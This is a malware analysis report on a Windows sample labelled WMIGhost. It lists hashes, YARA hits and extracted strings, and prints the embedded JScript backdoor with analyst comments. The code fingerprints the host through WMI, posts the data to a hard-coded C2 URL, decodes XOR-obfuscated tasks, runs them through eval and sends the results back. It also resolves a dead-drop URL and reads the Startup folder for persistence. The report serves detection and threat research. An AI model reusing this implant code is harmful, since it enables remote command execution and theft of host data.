Sample details: 460b288a581cdeb5f831d102cb6d198b --

Hashes
MD5: 460b288a581cdeb5f831d102cb6d198b
SHA1: a2614a8ffd58857822396a2740cf70a8424c5c3e
SHA256: 01259a104a0199b794b0c61fcfc657eb766b2caeae68d5c6b164a53a97874257
SSDEEP: 384:r6EWkcIvuAHzo7ZkpqwlUxmoY1y4gUvDkQ9:3wRtkjl+moCyFUvt9
Details
File Type: PE32
Yara Hits
YRP/Armadillo_v171 | YRP/Microsoft_Visual_Cpp_v60 | YRP/Microsoft_Visual_Cpp_v50v60_MFC_additional | YRP/Microsoft_Visual_Cpp_50 | YRP/Microsoft_Visual_Cpp_v50v60_MFC | YRP/Armadillo_v171_additional | YRP/Microsoft_Visual_Cpp | YRP/IsPE32 | YRP/IsWindowsGUI | YRP/HasRichSignature | YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/win_files_operation | YRP/android_meterpreter | FlorianRoth/DragonFly_APT_Sep17_3 |
Source
http://94.130.104.170/01259a104a0199b794b0c61fcfc657eb766b2caeae68d5c6b164a53a97874257
http://94.130.104.170/WMIGhost//01259a104a0199b794b0c61fcfc657eb766b2caeae68d5c6b164a53a97874257
http://94.130.104.170/WMIGhost/01259a104a0199b794b0c61fcfc657eb766b2caeae68d5c6b164a53a97874257
Strings
		!This program cannot be run in DOS mode.
`.rdata
@.data
GetFileAttributesA
MultiByteToWideChar
InterlockedDecrement
WideCharToMultiByte
WaitForSingleObject
CreateProcessA
MoveFileA
DeleteFileA
GetTempPathA
GetModuleFileNameA
WinExec
GetTempFileNameA
MoveFileExA
CopyFileA
FindClose
FindFirstFileA
KERNEL32.dll
SHGetSpecialFolderPathA
SHELL32.dll
CoInitialize
CoCreateInstance
OleRun
ole32.dll
OLEAUT32.dll
??0Init@ios_base@std@@QAE@XZ
??1Init@ios_base@std@@QAE@XZ
??0_Winit@std@@QAE@XZ
??1_Winit@std@@QAE@XZ
MSVCP60.dll
??2@YAPAXI@Z
__CxxFrameHandler
memcpy
memset
_beginthread
sprintf
malloc
strcat
strcpy
fclose
fprintf
strstr
strlen
strcmp
_CxxThrowException
__dllonexit
_onexit
MSVCRT.dll
_XcptFilter
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
??1type_info@@UAE@XZ
_controlfp
GetLastError
lstrlenA
LocalFree
GetModuleHandleA
GetStartupInfoA
JScript
http://192.168.66.184/sosblogs.xml
http://192.168.66.184/sosblogs.xml
http://192.168.66.184/sosblogs.xml
// Analyst note: JScript implant object embedded as a string in the PE; the
// 'new MAIN('%s','%s').Fire();' format string further down is presumably the
// template the binary fills in before running it. One Fire() call performs a
// single check-in. `$` is assigned without `var`, so it becomes a global alias
// for the instance.
var MAIN=function(sXmlUrl,sURLParam){
  $=this;
  $.sXmlUrl=sXmlUrl;     // endpoint that receives the POST check-ins
  $.sURLParam=sURLParam; // form-encoded host fingerprint (see getsURLParam)
  $._x=ActiveXObject;
  // COM objects for WMI, shell, binary stream and HTTP. Only oHttp is used by
  // the methods visible here; oWMI, oShell and oStream are created but never
  // referenced in this dump.
  $.oWMI=GetObject('winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2');
  $.oShell=new $._x('WScript.Shell');
  $.oStream=new $._x('ADODB.Stream');
  $.oHttp=new $._x('Microsoft.XmlHttp');
};
MAIN.prototype={
  // Tasking decoder: the first character is a single-byte XOR key, the rest
  // is a comma-separated list of numbers; each number is XORed with the key
  // and converted back to a character.
  Decode:function(sourceStr){
    var keycode=sourceStr.charCodeAt(0);
    var source=sourceStr.substr(1);
    var vals=source.split(',');
    var result='';
    for(var i=0;i<vals.length;i++){
      result+=String.fromCharCode(vals[i]^keycode);
    }
    return result;
  },
  // One check-in cycle. Returns '1' when the server replied with a non-empty
  // body and '0' otherwise; every network and parse error is swallowed.
  MainLoop:function(){
    var oXml=new $._x('MSXML2.DOMDocument.3.0');
    var response='';
    var commandresult='';
    try{
      // Synchronous POST of the host fingerprint; the reply body is trimmed.
      $.oHttp.Open('POST',$.sXmlUrl,false);
      $.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');
      $.oHttp.Send($.sURLParam);
      response=$.oHttp.ResponseText.replace(/(^\s*)|(\s*$)/g,'');
    }catch(e){}
    if(response.length>0){
      var commands=null;
      var container;
      try{
        // Tasking is hidden in an XML body: the <div> whose id equals the
        // fixed marker '0a552b5a4352' carries a JS object literal that is
        // eval'd, and its `command` property is the task list. The marker
        // string is a useful network-detection indicator.
        oXml.loadXML(response);
        container=oXml.getElementsByTagName('div');
        for(var i=0;i<container.length;i++){
          if(container[i].getAttribute('id')=='0a552b5a4352'){
            commands=eval('('+container[i].text+')').command;
          }
        }
      }catch(e){}
      if(commands!=null){
        // Each task value is XOR-decoded and executed as JScript through
        // eval; the result ('no response' on failure) is collected per task id.
        for(var i=0;i<commands.length;i++){
          var result='no response';
          try{
            result=eval($.Decode(commands[i].value));
          }catch(e){}
          if(i>0){commandresult+=',';}
          commandresult+='\''+commands[i].id+'\':\''+escape(result)+'\'';
        }
        if(commandresult.length>0){
          // Results go back to the same endpoint as a JSON-like object in the
          // `commandresult` form field, alongside the original fingerprint.
          commandresult='{'+commandresult+'}';
          $.oHttp.Open('POST',$.sXmlUrl,false);
          $.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');
          $.oHttp.Send($.sURLParam+'&command=result&commandresult='+commandresult);
        }
      }
      return'1';
    }
    return'0';
  },
  // Entry point; an exception escaping MainLoop is discarded (returns undefined).
  Fire:function(){
    try{
      return $.MainLoop();
    }catch(e){}
  }
};
// Analyst note: "circle" decoder applied to text fetched from a web page. The
// first character sets a per-string shift (code - 32); each following
// character is shifted back by that amount plus its position. Values that
// drop below 32 are wrapped back down from 126; since nc<32 there, (nc-32) is
// negative and JS `%` keeps the dividend's sign, which the wrap relies on.
function circleDecode(sc){
  var base=sc.charCodeAt(0);
  var s=base-32;
  var r='';
  for(var i=1;i<sc.length;i++){
    var nc=sc.charCodeAt(i)-s-i+1;
    if(nc<32){nc=126+(nc-32)%94;}
    r+=String.fromCharCode(nc);
  }
  return r;
};
// Synchronous GET through WinHttpRequest with a hard-coded, dated Firefox 3.5
// User-Agent -- a strong proxy-log indicator. Waits up to 30 s for the reply,
// then extracts the text between '@' markers inside <title> and unescapes
// &amp; and &quot;. Throws if the title pattern is absent (match() is null).
function getUrl(url){
  var oHttp=new ActiveXObject('WinHttp.WinHttpRequest.5.1');
  oHttp.Open('GET',url,false);
  oHttp.setRequestHeader('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.9.1) Gecko/20130530 Firefox/3.5');
  oHttp.Send();
  oHttp.waitForResponse(30000);
  return (((((oHttp.ResponseText.replace(/(^\s*)|(\s*$)/g,'')).match('<title>@(.*)@</title>'))[0]).match('@(.*)@'))[1]).replace(/&amp;/g,'&').replace(/&quot;/g, '\"');
};
// Dead-drop resolver: fetches a page and decodes the marker text. Presumably
// this yields the real check-in URL (the 'getPHPUrl('%s');' format string
// below is the call site), but the result's use is not visible in this dump.
function getPHPUrl(s){
  return circleDecode(getUrl(s));
};
// Analyst note: builds the form-encoded host fingerprint; presumably the
// sURLParam handed to MAIN (see the 'getsURLParam('%s');' format string
// below). Collected via WMI: OS caption plus service-pack major version, the
// computer name, and the MAC of the first connected (NetConnectionStatus=2)
// PCI network adapter. `authname`/`authpass` are fixed strings and `version`
// is a hard-coded tag, both usable as detection strings. `t` is the minutes
// and seconds concatenated as text (not summed), likely a cache-buster. If a
// WMI query returns nothing the field is emitted as 'undefined' or 'null'.
function getsURLParam(sOwner){
  var sOSType;
  var sHostName;
  var sMacAddress=null;
  var sURLParam=null;
  var version='8.6.1520';
  var oWMI=GetObject('winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2');
  var e=new Enumerator(oWMI.ExecQuery('Select * from Win32_OperatingSystem'));
  if(!e.atEnd()){
    var item=e.item();
    sOSType=escape(item.Caption)+item.ServicePackMajorVersion;
    sHostName=item.CSName;
  }
  e=new Enumerator(oWMI.ExecQuery('Select * from Win32_NetworkAdapter where PNPDeviceID like \"%PCI%\" and NetConnectionStatus=2'));
  if(!e.atEnd()){
    sMacAddress=e.item().MACAddress;
  }
  var time=new Date();
  sURLParam='cstype=server&authname=servername&authpass=serverpass&hostname='+sHostName+'&ostype='+sOSType+'&macaddr='+sMacAddress+'&owner='+sOwner+'&version='+version;
  sURLParam+='&t='+time.getMinutes()+time.getSeconds();
  return sURLParam;
};
// Analyst note: reads the all-users "Common Startup" folder path from the
// HKLM Shell Folders registry key. The 'ShellFolder();' and '\TPAutoConn.exe'
// strings below suggest the path is used to drop a file for persistence, but
// the write itself is not visible in this dump. regread throws if the value
// is missing; nothing here catches that.
function ShellFolder(){
  var oShell=new ActiveXObject('WScript.Shell');
  return oShell.regread("HKLM\\software\\microsoft\\windows\\currentVersion\\Explorer\\Shell Folders\\Common Startup")
};
\TPAutoConn.exe
\TPAutoConn.exe
Perfdata_2b0.js
\cscript.exe 
getPHPUrl('%s');
http://
getsURLParam('%s');
new MAIN('%s','%s').Fire();
ShellFolder();
.?AV_com_error@@
.?AVtype_info@@